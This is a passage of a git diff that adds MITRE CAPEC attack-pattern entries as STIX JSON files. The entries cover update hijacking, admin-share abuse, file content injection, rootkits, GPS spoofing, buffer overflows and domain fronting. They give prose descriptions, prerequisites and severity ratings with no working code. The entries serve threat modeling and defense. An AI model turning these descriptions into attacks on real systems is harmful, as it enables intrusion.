"bundle--0fddedd1-6bac-4d38-a77d-21dc06982302", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1513b3b5-9e47-4a77-ada3-bd85b535fa12", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Malicious Automated Software Update", + "description": "An attacker exploits a weakness in a server or client's process of delivering and verifying the integrity of code supplied by an update-providing server or mechanism to cause code of the attackers' choosing to be downloaded and installed as a software update. Attacks against automated update mechanisms involve attack vectors which are specific to the type of update mechanism, but typically involve two different attack strategies: redirection or spoofing. Redirection-based attacks exploit two layers of weaknesses in server or client software to undermine the integrity of the target code-base. The first weakness involves a failure to properly authenticate a server as a source of update or patch content. This type of weakness typically results from authentication mechanisms which can be defeated, allowing a hostile server to satisfy the criteria that establish a trust relationship. The second weakness is a systemic failure to validate the identity and integrity of code downloaded from a remote location, hence the inability to distinguish malicious code from a legitimate update. One predominate type of redirection attack requires DNS spoofing or hijacking of a domain name corresponding to an update server. The target software initiates an update request and the DNS request resolves the domain name of the update server to the IP address of the attacker, at which point the software accepts updates either transmitted by or pulled from the attackers' server. Attacks against DNS mechanisms comprise an initial phase of a chain of attacks that facilitate automated update hijacking attack, and such attacks have a precedent in targeted activities that have been as complex as DNS/BIND attacks of corporate infrastructures, to untargeted attacks aimed at compromising home broadband routers, as well as attacks involving the compromise of wireless access points, as well as 'evil twin' attacks coupled with DNS redirection. Due to the plethora of options open to the attacker in forcing name resolution to arbitrary servers the Automated Update Hijacking attack strategies are the tip of the spear for many multi-stage attack chains. The second weakness that is exploited by the attacker is the lack of integrity checking by the software in validating the update. Software which relies only upon domain name resolution to establish the identity of update code is particularly vulnerable, because this signals an absence of other security countermeasures that could be applied to invalidate the attackers' payload on basis of code identity, hashing, signing, encryption, and other integrity checking mechanisms. Redirection-based attack patterns work equally well against client-side software as well as local servers or daemons that provide software update functionality. One precedent of redirection-based attacks involves the active exploitation of Firefox extensions, such as the Google Toolbar, Yahoo Toolbar, Facebook Toolbar, and others. The second strategy employed in Automated Hijacking Attacks are spoofing strategies, including content or identity spoofing, as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers' server. Such attacks have numerous precedents, one in particular being eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers' code without integrity checking.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/187.html", + "external_id": "CAPEC-187" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html", + "external_id": "CWE-494" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--15c913ea-c4ac-48d3-9bbd-e1f0cf62bf87.json b/capec/attack-pattern/attack-pattern--15c913ea-c4ac-48d3-9bbd-e1f0cf62bf87.json new file mode 100644 index 0000000000..5393195c34 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--15c913ea-c4ac-48d3-9bbd-e1f0cf62bf87.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--c6d3e34f-ef13-45b5-8417-69e56684f0c4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--15c913ea-c4ac-48d3-9bbd-e1f0cf62bf87", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Windows Admin Shares with Stolen Credentials", + "description": "Windows systems have hidden network shares that are only accessible to administrators and allow files to be written to the local computer. Example network shares include: C$, ADMIN$ and IPC$. Adversaries may use valid administrator credentials to remotely access a network share to transfer files and execute code. It is possible for adversaries to use NTLM hashes to access administrator shares on systems with certain configuration and patch levels.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/561.html", + "external_id": "CAPEC-561" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html", + "external_id": "CWE-522" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69.json b/capec/attack-pattern/attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69.json new file mode 100644 index 0000000000..b74dfe96e9 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--6035d6a8-f58c-4cc8-8ba4-8cf204370783", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "File Content Injection", + "description": "An attack of this type exploits the host's trust in executing remote content, including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the adversary and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary's program can access relative directories such as C:\\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/23.html", + "external_id": "CAPEC-23" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The OWASP Guide Project, The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/File_System", + "external_id": "REF-88" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs.\n [R.23.2]\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target software must consume files.", + "The adversary must have access to modify files that the target software will consume." + ], + "x_capec_skills_required": { + "Medium": "How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--17938514-8a12-466f-b196-fc4d8a089d88.json b/capec/attack-pattern/attack-pattern--17938514-8a12-466f-b196-fc4d8a089d88.json new file mode 100644 index 0000000000..f43e80e63f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--17938514-8a12-466f-b196-fc4d8a089d88.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--97489e07-c6b8-49e4-b8ba-8d7483fcb84c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--17938514-8a12-466f-b196-fc4d8a089d88", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Hardware Update", + "description": "An adversary introduces malicious hardware during an update or replacement procedure, allowing for additional compromise or site disruption at the victim location. After deployment, it is not uncommon for upgrades and replacements to occur involving hardware and various replaceable parts. These upgrades and replacements are intended to correct defects, provide additional features, and to replace broken or worn-out parts. However, by forcing or tricking the replacement of a good component with a defective or corrupted component, an adversary can leverage known defects to obtain a desired malicious impact.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/534.html", + "external_id": "CAPEC-534" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_example_instances": [ + "An adversary develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the adversary. The adversary sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the adversary sends the malicious networking card. The malicious networking card replaces the perfectly-functioning original networking card, and the adversary is able to take advantage of the additional malicious functionality to further compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--17cecffc-77d8-4779-acf8-94e2ad075435.json b/capec/attack-pattern/attack-pattern--17cecffc-77d8-4779-acf8-94e2ad075435.json new file mode 100644 index 0000000000..e793875457 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--17cecffc-77d8-4779-acf8-94e2ad075435.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--bfe6282f-fc14-410c-a5e2-6de88642542a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--17cecffc-77d8-4779-acf8-94e2ad075435", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2017-01-12T00:00:00.000Z", + "name": "Orbital Jamming", + "description": "In this attack pattern, the adversary sends disruptive signals at a target satellite using a rogue uplink station to disrupt the intended transmission. Those within the satellite's footprint are prevented from reaching the satellite's targeted or neighboring channels. The satellite's footprint size depends upon its position in the sky; higher orbital satellites cover multiple continents.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/559.html", + "external_id": "CAPEC-559" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + "external_id": "REF-462" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the satellite communications for authorized users.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the knowledge of the satellite's coordinates for targeting." + ], + "x_capec_resources_required": [ + "A satellite uplink station." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1807956c-edf7-4fc4-b165-6959f745c791.json b/capec/attack-pattern/attack-pattern--1807956c-edf7-4fc4-b165-6959f745c791.json new file mode 100644 index 0000000000..75a0bce373 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1807956c-edf7-4fc4-b165-6959f745c791.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--c0e94a45-ed7d-4e88-be0f-19689b33d3cd", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1807956c-edf7-4fc4-b165-6959f745c791", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Counterfeit GPS Signals", + "description": "An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/627.html", + "external_id": "CAPEC-627" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_resources_required": [ + "Ability to create spoofed GPS signals." + ], + "x_capec_skills_required": { + "High": "The ability to spoof GPS signals is not trival." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--18d613ca-3840-4fb8-b628-e12a8b1fe2d4.json b/capec/attack-pattern/attack-pattern--18d613ca-3840-4fb8-b628-e12a8b1fe2d4.json new file mode 100644 index 0000000000..e2924284dd --- /dev/null +++ b/capec/attack-pattern/attack-pattern--18d613ca-3840-4fb8-b628-e12a8b1fe2d4.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--c3be9d56-c01d-4c3a-b5c1-49c2d8a47805", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--18d613ca-3840-4fb8-b628-e12a8b1fe2d4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)", + "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/235.html", + "external_id": "CAPEC-235" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--19021444-14a8-458a-bef8-cd234a57a3bb.json b/capec/attack-pattern/attack-pattern--19021444-14a8-458a-bef8-cd234a57a3bb.json new file mode 100644 index 0000000000..8e10a38420 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--19021444-14a8-458a-bef8-cd234a57a3bb.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--898794c0-b30c-4d77-acf8-276b7a726428", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--19021444-14a8-458a-bef8-cd234a57a3bb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Expanding Control over the Operating System from the Database", + "description": "An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/470.html", + "external_id": "CAPEC-470" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html", + "external_id": "CWE-250" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html", + "external_id": "CWE-89" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Bernardo Damele Assump \u00e7\u00e3o Guimar\u00e3es, Advanced SQL Injection to Operating System Full Control, 2009--04---10", + "url": "http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf", + "external_id": "REF-408" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means" + ], + "x_capec_skills_required": { + "High": "Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a.json b/capec/attack-pattern/attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a.json new file mode 100644 index 0000000000..080ad6d72f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a.json @@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--72ba00ba-f568-451d-8f34-d8ef9a8b0f8b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Using Alternative IP Address Encodings", + "description": "This attack relies on the attacker using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/4.html", + "external_id": "CAPEC-4" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/291.html", + "external_id": "CWE-291" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target software must fail to anticipate all of the possible valid encodings of an IP/web address.", + "The adversary must have the ability to communicate with the server." + ], + "x_capec_resources_required": [ + "The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities." + ], + "x_capec_skills_required": { + "Low": "The adversary has only to try IP address format combinations." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--19d11bcb-4e3e-4f55-8fb8-d91f068bc67b.json b/capec/attack-pattern/attack-pattern--19d11bcb-4e3e-4f55-8fb8-d91f068bc67b.json new file mode 100644 index 0000000000..5559c49821 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--19d11bcb-4e3e-4f55-8fb8-d91f068bc67b.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--a94be6f8-63f5-4c7e-a498-7fd3cb113fa7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--19d11bcb-4e3e-4f55-8fb8-d91f068bc67b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Install Rootkit ", + "description": "An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/552.html", + "external_id": "CAPEC-552" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "A rootkit may take the form of a hypervisor. A hypervisor is a software layer that sits between the operating system and the processor. It presents a virtual running environment to the operating system. An example of a common hypervisor is Xen. Because a hypervisor operates at a level below the operating system it can hide its existence from the operating system.", + "Similar to a rootkit, a bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0.json b/capec/attack-pattern/attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0.json new file mode 100644 index 0000000000..ebe44ee49e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0.json @@ -0,0 +1,127 @@ +{ + "type": "bundle", + "id": "bundle--b1f2f90e-e7d4-4dbe-b303-938d2b994345", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Buffer Overflow via Environment Variables", + "description": "This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/10.html", + "external_id": "CAPEC-10" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html", + "external_id": "CWE-302" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html", + "external_id": "CWE-118" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html", + "external_id": "CWE-99" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html", + "external_id": "CWE-733" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Sharefuzz", + "url": "http://sharefuzz.sourceforge.net", + "external_id": "REF-2" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: Buffer Overflow in $HOME\n A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable.See also: CVE-1999-0906", + "\n Attack Example: Buffer Overflow in TERM\n A buffer overflow in the rlogin program involves its consumption of the TERM environmental variable.See also: CVE-1999-0046" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application uses environment variables.", + "An environment variable exposed to the user is vulnerable to a buffer overflow.", + "The vulnerable environment variable uses untrusted data.", + "Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1a4b477e-958d-48ca-8c71-7faef4da949d.json b/capec/attack-pattern/attack-pattern--1a4b477e-958d-48ca-8c71-7faef4da949d.json new file mode 100644 index 0000000000..f262f2b413 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1a4b477e-958d-48ca-8c71-7faef4da949d.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--e0a2071a-313b-4c00-b138-e1e0a9e4314a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1a4b477e-958d-48ca-8c71-7faef4da949d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Pretexting", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/411.html", + "external_id": "CAPEC-411" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1b1d3a84-d44b-4848-bb0a-e0fd7f1c05bf.json b/capec/attack-pattern/attack-pattern--1b1d3a84-d44b-4848-bb0a-e0fd7f1c05bf.json new file mode 100644 index 0000000000..43f0f9e8b2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1b1d3a84-d44b-4848-bb0a-e0fd7f1c05bf.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--971827ed-f84e-40c7-b5bf-ce1dfb7685c0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1b1d3a84-d44b-4848-bb0a-e0fd7f1c05bf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Contradictory Destinations in Traffic Routing Schemes", + "description": "Adversaries can provide contradictory destinations when sending messages. Traffic is routed in networks using the domain names in various headers available at different levels of the OSI model. In a Content Delivery Network (CDN) multiple domains might be available, and if there are contradictory domain names provided it is possible to route traffic to an inappropriate destination. The technique, called Domain Fronting, involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. An alternative technique, called Domainless Fronting, is similar, but the SNI field is left blank.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/481.html", + "external_id": "CAPEC-481" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary must be aware that their message will be routed using a CDN, and that both of the contradictory domains are served from that CDN.", + "If the purpose of the Domain Fronting is to hide redirected C2 